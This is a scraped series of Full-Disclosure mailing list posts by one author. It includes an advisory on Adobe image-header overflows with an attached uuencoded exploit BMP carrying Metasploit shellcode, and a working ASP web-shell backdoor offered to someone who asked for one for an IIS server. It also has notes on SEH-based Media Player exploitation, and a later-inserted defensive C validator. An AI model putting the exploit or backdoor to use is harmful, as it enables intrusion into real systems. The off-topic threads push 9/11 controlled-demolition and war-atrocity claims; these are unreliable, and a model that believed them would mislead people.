[Full-disclosure] Adobe Unchecked Overflow

2008-04-21 Thread c0ntex
Exploitable issue in various Adobe products
c0ntex ([EMAIL PROTECTED]) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of image headers, in that the applications
do not verify that the image header is valid before trying to render it. This
leaves an opportunity to cause an unchecked buffer overflow and allow for the
execution of malicious code.

All the issues are standard local overflows whereby an attacker can exploit a
machine after sending the malicious image to the user, or by placing the image
on a web site or in an email and waiting for a user to view it in one of the
affected products.

One fun thing with Album Starter is that it will run a service which will look
for new devices being attached to the system, things like cameras or USB
drives, and when one is found it will check the device for image files. If some
are found, the application will auto-run and import the images and thus allow
the attacker to exploit locked workstations. Pretty lame but fun :)

There is a caveat to the bug as the shellcode and return address need to be
4-byte values. Thus a return address of 0x41424344 needs to be in the following
format: \x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41
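As an added example (not code from this advisory, and not Adobe's code), this is the kind of header validation the advisory says is missing: a BMP header check that tests every size-bearing field against the bytes actually present before any buffer is sized from it. The BMP layout is assumed from the attached exploit's .bmp extension; the 32768 dimension cap, the function names and the constructed sample headers are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Classic BITMAPFILEHEADER (14 bytes) + BITMAPINFOHEADER (40 bytes). */
#define BMP_FILE_HDR  14u
#define BMP_INFO_HDR  40u
#define BMP_MIN_SIZE  (BMP_FILE_HDR + BMP_INFO_HDR)
#define BMP_MAX_DIM   32768u  /* assumed policy cap on width/height, not a BMP rule */

typedef struct {
    uint32_t file_size, pixel_offset, compression;
    int32_t  width, height;
    uint16_t planes, bpp;
    uint64_t row_bytes, pixel_bytes;  /* derived from the header, overflow-checked */
} bmp_hdr_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Validate every header field against the bytes actually present before any
 * buffer is allocated or copied from it. Returns 0 if safe to decode, else a
 * negative code naming the first field that failed. */
int bmp_validate(const uint8_t *buf, size_t len, bmp_hdr_t *out)
{
    bmp_hdr_t h; memset(&h, 0, sizeof h);
    if (len < BMP_MIN_SIZE) return -1;                 /* truncated header */
    if (buf[0] != 'B' || buf[1] != 'M') return -2;     /* bad magic */
    h.file_size    = rd32(buf + 2);
    h.pixel_offset = rd32(buf + 10);
    uint32_t info_size = rd32(buf + 14);
    if (info_size < BMP_INFO_HDR || info_size > len - BMP_FILE_HDR) return -3;
    h.width       = (int32_t)rd32(buf + 18);
    h.height      = (int32_t)rd32(buf + 22);
    h.planes      = rd16(buf + 26);
    h.bpp         = rd16(buf + 28);
    h.compression = rd32(buf + 30);
    if (h.file_size != len) return -4;                 /* header lies about file size */
    if (h.planes != 1) return -5;
    if (h.bpp != 1 && h.bpp != 4 && h.bpp != 8 && h.bpp != 16 && h.bpp != 24 && h.bpp != 32) return -6;
    if (h.compression != 0) return -7;                 /* only BI_RGB handled here */
    if (h.width <= 0 || (uint32_t)h.width > BMP_MAX_DIM) return -8;
    if (h.height == INT32_MIN) return -9;              /* -INT32_MIN would overflow */
    uint32_t abs_h = (uint32_t)(h.height < 0 ? -h.height : h.height); /* negative = top-down */
    if (abs_h == 0 || abs_h > BMP_MAX_DIM) return -9;
    /* Row stride is padded to 4 bytes; under the caps 64-bit arithmetic cannot wrap. */
    h.row_bytes   = (((uint64_t)h.width * h.bpp + 31) / 32) * 4;
    h.pixel_bytes = h.row_bytes * abs_h;
    if ((uint64_t)h.pixel_offset < BMP_FILE_HDR + (uint64_t)info_size || h.pixel_offset > len) return -10;
    if (h.pixel_bytes > (uint64_t)(len - h.pixel_offset)) return -11; /* claims more pixels than bytes present */
    if (out) *out = h;
    return 0;
}

/* Build a constructed 54-byte header (hypothetical sample, no real image) for the checks above. */
static void make_header(uint8_t *p, uint32_t file_size, int32_t w, int32_t h, uint16_t bpp)
{
    memset(p, 0, BMP_MIN_SIZE);
    p[0] = 'B'; p[1] = 'M';
    wr32(p + 2, file_size); wr32(p + 10, BMP_MIN_SIZE); wr32(p + 14, BMP_INFO_HDR);
    wr32(p + 18, (uint32_t)w); wr32(p + 22, (uint32_t)h);
    wr16(p + 26, 1); wr16(p + 28, bpp);
}

/* Constructed 2x2, 24 bpp image: 2 rows of 8 padded bytes -> 54 + 16 = 70 bytes. */
int demo_valid(void)
{
    uint8_t img[70]; memset(img, 0, sizeof img);
    make_header(img, sizeof img, 2, 2, 24);
    return bmp_validate(img, sizeof img, NULL);   /* 0 */
}

/* Same 70-byte file, but the header claims 30000x30000 at 32 bpp: a decoder that
 * sizes its buffer from width*height*bpp and then copies the file overruns. */
int demo_oversized(void)
{
    uint8_t img[70]; memset(img, 0, sizeof img);
    make_header(img, sizeof img, 30000, 30000, 32);
    return bmp_validate(img, sizeof img, NULL);   /* -11 */
}

/* Negative width: a sign-confused stride calculation is a classic overflow source. */
int demo_negative_width(void)
{
    uint8_t img[70]; memset(img, 0, sizeof img);
    make_header(img, sizeof img, -1, 2, 24);
    return bmp_validate(img, sizeof img, NULL);   /* -8 */
}

int main(void)
{
    printf("valid=%d oversized=%d negative=%d\n", demo_valid(), demo_oversized(), demo_negative_width());
    return 0;
}
```

The point of the check is the ordering: the decoder must derive its buffer size from header fields that have already been bounded against the real file length, rather than allocating from untrusted dimensions and trusting the copy to stop in time.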


Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:
Used shellcode is taken from the Metasploit project.


begin 644 Adobe_AS_Exploit.bmp
[EMAIL PROTECTED]
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04'\:NM-Z/[EMAIL PROTECTED])(M%/([EMAIL PROTECTED]/
M(M?(`'K28LTBP'N,9K(3`=[EMAIL PROTECTED]+K]#M4)AUY8M?)`'K9HL,2XM?
M'`'K`RR+B6PD''#,=MDBT,PBT`,BW`K8M`[EMAIL PROTECTED],FAW
MS)?5/_0:,OM_#M0_]9?B5F@T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
MT9H!-)F4XGAE6BDG#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
M5%15_]3:.=YQGE7_]95_]!F:F1F:-MB5J4%DIS(GG:D2)XC'`\ZK^0BW^
M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!Y3_]9J__\W
M_]+5_R#Q3_UE+_T[EMAIL PROTECTED]
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04

Re: [Full-disclosure] Live is Live

2006-09-20 Thread c0ntex
Nothing new, been flawed forever and shall remain so until the end of time  :-)

http://open-security.org/msn.JPG



On 20/09/06, bluepill [EMAIL PROTECTED] wrote:

 http://www.live.com/?%3Ci%3E

 Oh my.

 Luckily this company doesn't produce anything people need to rely on in terms 
 of security, such as... an OS, a database, a web server, a distributed online 
 authentication system or something.


 _
 Porn on your PC? Are you sure ? Scan your PC for FREE Now
 --- http://www.contentpurity.com/scanintro.htm ---

 PC running slower? Tons of pop-ups?   You have spyware on your PC.  Click 
 here for a FREE SCAN!
 --- http://www.contentpurity.com/ccount/click.php?id=1 ---

 You may need to copy and paste the links above into your browser.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



-- 

regards
c0ntex



Re: [Full-disclosure] Good ASP backdoor?

2006-09-14 Thread c0ntex
Nothing spiffing but it works,

<%@ Page language="VB" Debug="true" aspcompat="true" %>
<%
shell("C:\Program Files\WebApp\Uploads\owned.bat")
%>
<script runat="server">
   Sub blah()
   Dim SpawnShell = server.CreateObject("WScript.Shell")
   SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat")
   End sub
</script>


then just upload your tools and run via the bat file.  Does the job.


On 14/09/06, Jason Miller [EMAIL PROTECTED] wrote:
 http://replica-solutions.de/
 has some php based ones, check it out

 On 9/14/06, Exibar  [EMAIL PROTECTED] wrote:
  NetCat is a tried and true favorite
 
 
  - Original Message -
  From: Lachniet, Mark [EMAIL PROTECTED]
  To: full-disclosure@lists.grok.org.uk
  Sent: Thursday, September 14, 2006 2:44 PM
  Subject: [Full-disclosure] Good ASP backdoor?
 
 
   Can anyone suggest a good backdoor for placing on an IIS server when you
   can upload a file to document root?  For example an all-in-one tool with
   upload, download, command execution, etc.  There are several basic ones
   out there - I was wondering if anyone ever wrote a really spiffy one.
  
   Thanks in advance,
  
   Mark Lachniet
  
  
  
 
 






-- 

regards
c0ntex



Re: [Full-disclosure] RE: OT - Check this out - Full disclosure is apt for this

2006-09-12 Thread c0ntex

Good sir, if what you say be true, show me your proof.

Also, using your medical training, explain the injuries to the bodies
in Falluja.

Thanks  :-)


On 12/09/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

Contex -



If you consider that America are
able to lie about the weapons of mass
destruction and then admit it,

America never lied about WMD.
America is not in a position to prove that any WMD stockpiles
existed past December of 1998, when Saddam kicked out the UN; but
at worst that makes them wrong, not liars.



=
use chemical weapons in Iraq and lie
about it and then admit it
=
America did not use Nerve Agents or Blister Agents in Iraq.
Nerve Agents and Blister Agents are Chemical Weapons.
Smoke Generators and tear gas are not. Unless of course you are
seeking to redefine the word to fit a political agenda.




On Wikipedia they also discuss the
mans criminal history, what has
that got to do with anything other
than making the man seem unreliable.

He IS unreliable. He is also a fake.
His criminal history is part of his backstory.
On a personal note, speaking as someone who HAS served with the 3/75 Ranger
Regiment, it is my opinion that after what he did to besmirch the honor of
a Regiment that he never belonged to in the first place, he deserves to
have his name dragged through the mud. HE brought it upon HIMSELF.



==
There are numerous other people
who talk about the terror that has
gone on in Iraq, including the use
white phosphorous
==
White Phosphorous rounds are used to generate what is known as Quick
Smoke. It's called Quick Smoke because WP rapidly generates thick white
clouds of dense smoke and as such is useful for situations where you want
to obscure the movement of friendly troops.
For the record, I did not look that up on Wikipedia, it was part of my
military Training as a Forward Observer. I am an expert of what is known as
Indirect Fire Support and the ammunition used therein. So when I tell you
that WP is a SMOKE GENERATOR and is neither a Chemical Weapon within the
meaning of WMD, nor is it even remotely related to Napalm.



You do your cause no favor when you join the Tinfoil Hat brigade.



mail2web - Check your email from the web at
http://mail2web.com/ .






--

regards
c0ntex



Re: [Full-disclosure] RE: OT - Check this out - Full disclosure is apt for this

2006-09-12 Thread c0ntex

On 12/09/06, bkfsec [EMAIL PROTECTED] wrote:


I think you two are using different definitions for Chemical Weapons,
perhaps.


I think so, though chemical weapons have been used.

There are hundreds / thousands of bodies that have been melted almost
to the bone, while their clothes are flawlessly intact, some have other
horrific injuries yet the same outcome, either skin has peeled away
from the flesh of their bodies, while parts of their face, or limbs
have melted away completely - others who are alive have abnormalities
appearing, strange bulges in their limbs, one child's head has expanded
(one who survived) yet the victims' clothes are still undamaged, pretty
neat bullets and pretty neat smoke.

--

regards
c0ntex



Re: [Full-disclosure] OT - Check this out - Full disclosure is apt for this

2006-09-11 Thread c0ntex

You are entitled to your opinion.

On 11/09/06, Philosophil [EMAIL PROTECTED] wrote:

A link to your own blog is not support for your argument.  That's
called circular reasoning.

In addition, if you had bothered to do a little research, you would
have noticed *huge* discrepancies.

Try here:

http://en.wikipedia.org/wiki/Jesse_Macbeth


The unit he claimed he was in, was not deployed where he said it was.

His flash (patches, unit designations) on his uniform are either put
on incorrectly, not used by the division he claims to be in, and/or no
longer used by the military.

His uniform is wildly... well, inconsistent is the best word here.

Some of the awards and citations he claims to have received would be
impossible to earn in the time he was active.

Really, I am constantly amazed by the lack of critical thinking people
exhibit these days.  It doesn't take long to find actual citations to
back up a position.  A loon talking in a video is *not* a credible
source.  Unfortunately, people want to believe something that backs
their own opinions so much that they will take unsubstantiated stories
as truth and use that as evidence.  Of course when someone points out
that evidence is fraud and fake...  Well, at best the person gets
ignored, at worst a tool of the vast neo-con conspiracy.  (Seriously,
given the government's track record at keeping things secret... a
vast conspiracy is ridiculous at best)

Hoax and fraud does nothing but weaken one's position regardless of
that position's overall merits.




On 9/11/06, c0ntex [EMAIL PROTECTED] wrote:
 http://noderat.spaces.live.com/blog/cns!6ADE4614B66EADD2!1321.entry


 On 11/09/06, Philosophil [EMAIL PROTECTED] wrote:
  Uh.  You do realize this was a hoax, right?
 
  On 9/9/06, c0ntex [EMAIL PROTECTED] wrote:
   http://video.google.co.uk/videoplay?docid=-5587990522549547050
  
   --
  
   regards
   c0ntex
  
  
 


 --

 regards
 c0ntex





--

regards
c0ntex



Re: [Full-disclosure] OT - Check this out - Full disclosure is apt for this

2006-09-11 Thread c0ntex

If you consider that America are able to lie about the weapons of mass
destruction and then admit it, use chemical weapons in Iraq and lie
about it and then admit it, trick Saudi Arabia that Saddam Hussein was
attacking their border to allow army convoys to be deployed in their
country, mishandle Iraq's millions of dollars which seemed to vanish
(which is currently under investigation with 3 confirmed arrests), a
power company who coincidentally has a top US official on the board of
directors win a multi million dollar contract with no competition to
do ALL the power restoration work in Iraq.

So America own the world with their porkies yet the most powerful
country in the world is incapable of influencing 8 or 10 people about
a war record which is controlled by the US government, influencing 1
man in charge of the IVAW (which they never actually deny this man was
a member), and drop 2 news articles to Americans media to bad name
this man then you have been eating too many pancakes and twinkies.

On Wikipedia they also discuss the man's criminal history, what has
that got to do with anything other than making the man seem
unreliable.

If you look at the media on my blog, you will notice many distressing
issues, you will actually see innocent people being shot and the
soldiers laughing on several occasions - it is not just this one video
by this one man.

The most well known behind the scenes investigation program
Dispatches, from the UK does numerous documentaries on these issues,
as well as the most highly credible news reporters - are they also
telling porkies? I hardly think so.

There are numerous other people who talk about the terror that has
gone on in Iraq, including the use of white phosphorus, which is then
verified by 2 ex soldiers (US) along with live media footage of the
drops, doctor examinations and leaked documents from the US and
UK. but like I said, you are all entitled to your own opinions.


On 11/09/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

--On September 11, 2006 8:20:51 PM +0100 c0ntex [EMAIL PROTECTED] wrote:

 You are entitled to your opinion.

Yeah, and it sucks that his is fact-based, doesn't it?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/








--

regards
c0ntex



[Full-disclosure] Re: OT - Check this out - Full disclosure is apt for this

2006-09-09 Thread c0ntex

Another:

http://video.google.co.uk/videoplay?docid=-5702006622816922747

Makes me sick.

On 10/09/06, c0ntex [EMAIL PROTECTED] wrote:

http://video.google.co.uk/videoplay?docid=-5587990522549547050

--

regards
c0ntex




--

regards
c0ntex



[Full-disclosure] OT - Check this out - Full disclosure is apt for this

2006-09-09 Thread c0ntex

http://video.google.co.uk/videoplay?docid=-5587990522549547050

--

regards
c0ntex



Re: [Full-disclosure] F-Secure to release XSS potential dangers

2006-07-27 Thread c0ntex

On 27/07/06, n3td3v [EMAIL PROTECTED] wrote:

You missed the point of my post.


That is highly probable.

If you like, I can do you a great deal on a new DIY FBI (penetrator
series) starter kit? it includes a magnifying glass, invisible ink,
plastic handcuffs, a walkie-talkie which doubles as a water pistol, a
whoopee cushion, Hacking Linux Exposed and a copy of WHAX.

regards
c0ntex



Re: [Full-disclosure] F-Secure to release XSS potential dangers

2006-07-26 Thread c0ntex

On 26/07/06, n3td3v [EMAIL PROTECTED] wrote:


F-Secure know the enemy of the Netscape web site are reading their blog:


I see you notice that f-secure, a security company, have released
information about a security bug - well spotted - next, you
thoughtlessly share your opinion and disgust about said site
advertising said information, then work a form of magic that surpasses
even Harry Potter's book of wizardry by sending /to a public mailing
list/  a link to the same information. You then execute ./mounth -vv,
as opposed to the earlier ./mouth -v, providing a nice write-up about the
bug, netscape and security for search bots to index.

Netscape is d00med!! and it is all n3td3v's fault lol

--

regards
c0ntex



Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread c0ntex

On 12/06/06, David Loyall [EMAIL PROTECTED] wrote:

Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper
write-up, and encourage them to close the hole, that'd be wonderful.


I know this guy who has over 7 years of direct security influence with
Yahoo and Google security engineers!

In 1972, a crack commando unit was sent to social prison by a mailing
list for a claim they couldn't prove. These men promptly escaped from
a maximum security stockade to the Moon. Today, still wanted by nobody
other than their mommy, they survive playing soldiers of fortune. If
you have a problem with Yahoo or any fortune 500 that may be hiring
black hat hackers as part of internal espionage, if no one else can
help, and if you can find them, maybe you can hire...The n3td3v Group

--

regards
c0ntex



Re: [Full-disclosure] ASLR now built into Vista

2006-05-26 Thread c0ntex

On 26/05/06, David Litchfield [EMAIL PROTECTED] wrote:

Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I
wrote about ASLR on the Windows platform back in September last year [2] and
noted that unless you rebase the image exe then little (not none!) is added.
ASLR in Vista solves this so remote exploitation of overflows has just got a
lot harder. I've not done a thorough analysis yet but, all going well, this
is a fantastic way for Microsoft to go and builds on the work done with
NX/DEP and stack cookies/canaries.


Since ASLR has been in and has been trivially circumvented in Linux
for years now (see my papers on return-to-libc & return-to-got) I
don't see it being a particularly hard issue to defeat :-)  Maybe
though, if they also randomise some other key areas like heap
locations and do some fancy relocation to non writable/executable
pages plus the drop-in of some ascii armour, we might then be on par
with a hardened Linux or *BSD..

Granted, I haven't looked at Vista yet :)

--

regards
c0ntex



Re: [Full-disclosure] Black clouds over Sunnyvale go unchecked

2006-05-22 Thread c0ntex

this guy has hosted interviews and has successfully hired more hackers.
there is also intelligence that he wants in the long run to hire more
folks from a blackhat social background. i instant messaged and have
been e-mailing yahoo core security team for a sustained period over the
issue of the particular employee


LOL, messaging Yahoo core security team - do you mean massaging? You
truly are a nob jocky, saddle up and ride into the sunset you buffoon.

--

regards
c0ntex



Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-18 Thread c0ntex

WTC 7 was demolished at 5pm or thereabouts by controlled demolition.
The owner of the building admits that they decided to pull it, the
reason being that so many people had been killed in the other 2
towers. Odd reason, considering what information was stored there.

Check it out at http://www.911revisited.com/video.html

On 18/05/06, Ducki3 [EMAIL PROTECTED] wrote:



Apparently so, since we'll swallow any cockamamie conspiracy theory that
comes along.



Paul, I am not saying I believe all the conspiracy Theories or that the
government was behind it. I don't really know. But I do know from reading
the government Northwood documents that it isn't beyond the government's
thoughts to attempt something like this. I know it doesn't mean they did but
it does mean they have thought of doing this.



All I am saying is that it is a possibility and while the counter evidence
you provided is plausible on why the towers collapsed. Sure, I understand
that the amount of Jet fuel spread so quickly on the whole floor caused
structural failure of the trusses causing the building to collapse. But I am
trying to dig up why WTC 7 collapsed when it didn't have raging jet fuel
fire burning through it. The document didn't explain that part.



Val's comment was that many buildings have collapsed from neighboring fires
like the Chicago fire of 1871. As for Chicago Fire of 1871, yes most of the
buildings were gutted out from fire. These are buildings that are pre 20th
century. Made with what? Wood, brick, some steel? I am trying to find a more
modern case of a building collapsing (not gutted) of structural fire
(besides the obvious two towers which a plausible case was already made).



The eye witness accounts of the Pentagon crash. There are indeed numerous
accounts all of which contradict each other. Some people saw American
Airlines, some people saw a commuter looking plane in the area, some a C-130
overhead. Control towers say the plane was maneuvering too fast to be an
airliner.  So I don't buy into any of the eye witness accounts of either
side, I wasn't there. I do know that it's possibly on tape somewhere that
government will not release for whatever security reasons. They did release
a 4 frame clip from the parking lot camera that shows no plane in it. That
does no good.



There are too many things to debate and piece together (WTC 7, Cell phones
at high altitudes, Pre warning messages, Northwood, Pentagon Holes, Collapse
rates, etc.) and some of the conspiracy is utter bull and some seems
plausible to me. I guess it's up to every individual to make that conclusion
on their own by looking at BOTH sides, not one. And I'm not applying this
to you Paul but in general because I don't know what you have read and what
you haven't but when people haven't examined both sides and all of the
theories then you have ceased to be a free thinker. Because there isn't just
1 or 2 subjects in this conspiracy theory. There is more than a few dozen.


Peace,


Ducki3





--

regards
c0ntex



Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-17 Thread c0ntex

http://www.911revisited.com/video.html

:-(

--

regards
c0ntex



Re: [Full-disclosure] Let's Not Forget Whose In Charge

2006-05-06 Thread c0ntex

On 06/05/06, redsand [EMAIL PROTECTED] wrote:



I just wanted to remind everyone how this mailing list USED to be.
Remember when it USED to be better? Cooler? Faster? Stronger? Back when
all those nifty cool 1-day and 0-day exploits were dropped randomly just
so we could watch the security industry scramble to take cover?


Boy THOSE were the days!!!


http://blacksecurity.org


3++

--

regards
c0ntex



Fwd: [Full-disclosure] Internet Explorer User Interface Races, Redeux

2006-04-27 Thread c0ntex
On 27/04/06, n3td3v [EMAIL PROTECTED] wrote:

more useless garbage, and more and more and more.

Just gonnae no' - damn my pixels are wasting away with your nonsense,
if you wanna bitch to the guy, email him directly. This list isn't
designed for your drivel and your emails are 99% off topic here, so
with my warmest, heartfelt interest in your welfare, have a cup of
scalding stfu.

I realise me emailing is off topic too, but I am hoping that if I
complain about you as often as you post junk here, I might become as
famous as you and all the top websites will know who I am and will
realise I too, like you, am a true hacker releasing top rated, high
profile posts to the list. You might just trampoline my career to an
all-time high  :-)

--

regards
c0ntex


--

regards
c0ntex



Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux

2006-04-27 Thread c0ntex
Oh, and my mate thinks you're a nob jockey  lol

On 27/04/06, c0ntex [EMAIL PROTECTED] wrote:
 On 27/04/06, n3td3v [EMAIL PROTECTED] wrote:

 more useless garbage, and more and more and more.

 Just gonnae no' - damn my pixels are wasting away with your nonsense,
 if you wanna bitch to the guy, email him directly. This list isn't
 designed for your drivel and your emails are 99% off topic here, so
 with my warmest, heartfelt interest in your welfare, have a cup of
 scalding stfu.

 I realise me emailing is off topic too, but I am hoping that if I
 complain about you as often as you post junk here, I might become as
 famous as you and all the top websites will know who I am and will
 realise I too, like you, am a true hacker releasing top rated, high
 profile posts to the list. You might just trampoline my career to an
 all-time high  :-)

 --

 regards
 c0ntex


 --

 regards
 c0ntex



--

regards
c0ntex



[Full-disclosure] Remote Xine Format String Vulnerability

2006-04-18 Thread c0ntex
http://www.open-security.org/advisories/16

--

regards
c0ntex



Re: [Full-disclosure] info about recent Ms issue

2006-04-15 Thread c0ntex
On 14/04/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 this is not a vulnerability for MS because the .hlp file is a script
 file and they believe that's not secured at all, c0ntex just posted a
 fresh advisory of something which has been found years ago, disclosed
 hundreds of times, but he looks to have time to lose.

Where is the heap overflow in Windows Help that has been discussed
thousands of times? I never once discussed the scriptable issue with
.hlp files because that is not my interest, my interest is in
manipulating process execution by overwriting memory.

Your English is good enough to talk bollox but obviously not good
enough to read.

Anyway, 4 more Windows heap overflows coming on their way just
awaiting your criticism  :-)

--

regards
c0ntex



[Full-disclosure] Windows Help Heap Overflow

2006-03-31 Thread c0ntex
http://www.open-security.org/advisories/15

--

regards
c0ntex



[Full-disclosure] Advisory # x Thu Mar 16 21:05:55 EST 2006 x # Heap Overflow in Microsoft Windows 2003

2006-03-16 Thread c0ntex



Advisory # x Thu Mar 16 21:05:55 EST 2006 x # Heap Overflow in Microsoft 
Windows 2003




APPENDIX A VENDOR INFORMATION
http://www.microsoft.com



CONTACT
c0ntex [EMAIL PROTECTED]
1-888-565-9428
BEWARE THE JIZZTAPO!!!

..
_ .' `.
   /\)
  / /
 / /   /\
 \ \  /  \
  _   \ \/ /\ \
 (/\   \  /  \ \
  \ \  /  \   (Y )
   \ \/ /\ \   
\  /  \ \
 \/   / /
 / /
( Y)
 


CISSP CCE GREM SSP-MPA GHTQ 



Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-17 Thread c0ntex
On 17/02/06, H D Moore [EMAIL PROTECTED] wrote:
... the non-alpha prefix is only used if you
 don't pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2.

Yea, exactly, used msfpayload (non-web) and it works perfectly - thank you HD

--

regards
c0ntex


Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-17 Thread c0ntex
On 17/02/06, c0ntex [EMAIL PROTECTED] wrote:
 Yea, exactly, used msfpayload (non-web) and it works perfectly - thank you HD

oops, msfpayload  msfencode.

--

regards
c0ntex


[Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread c0ntex
No exploit, just some basic research - anyone with 100% Ascii win32 shellcode?

http://open-security.org/winmedia/index.html

--

regards
c0ntex


Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation

2006-02-16 Thread c0ntex
On 16/02/06, H D Moore [EMAIL PROTECTED] wrote:
 Still getting some annoying crashes (SEH trick in alphanum code is
 annoying when you are trying to debug something...), but the basic
 solution is:

Ye, we are on the same path if you looked at my notes, SEH works
flawlessly and can redirect no problem, but getting the stable
location to have it go is the problem. I had to reject the pass
shellcode in the src= method as I am finding your Alpha shellcode
sketchy and not 100% alpha :p due to the FF and other annoying
characters, which cause it to bork.

I'm working on another method which is looking more realistic but I
need to wait til tomorrow now as I need to sleep  :)

--

regards
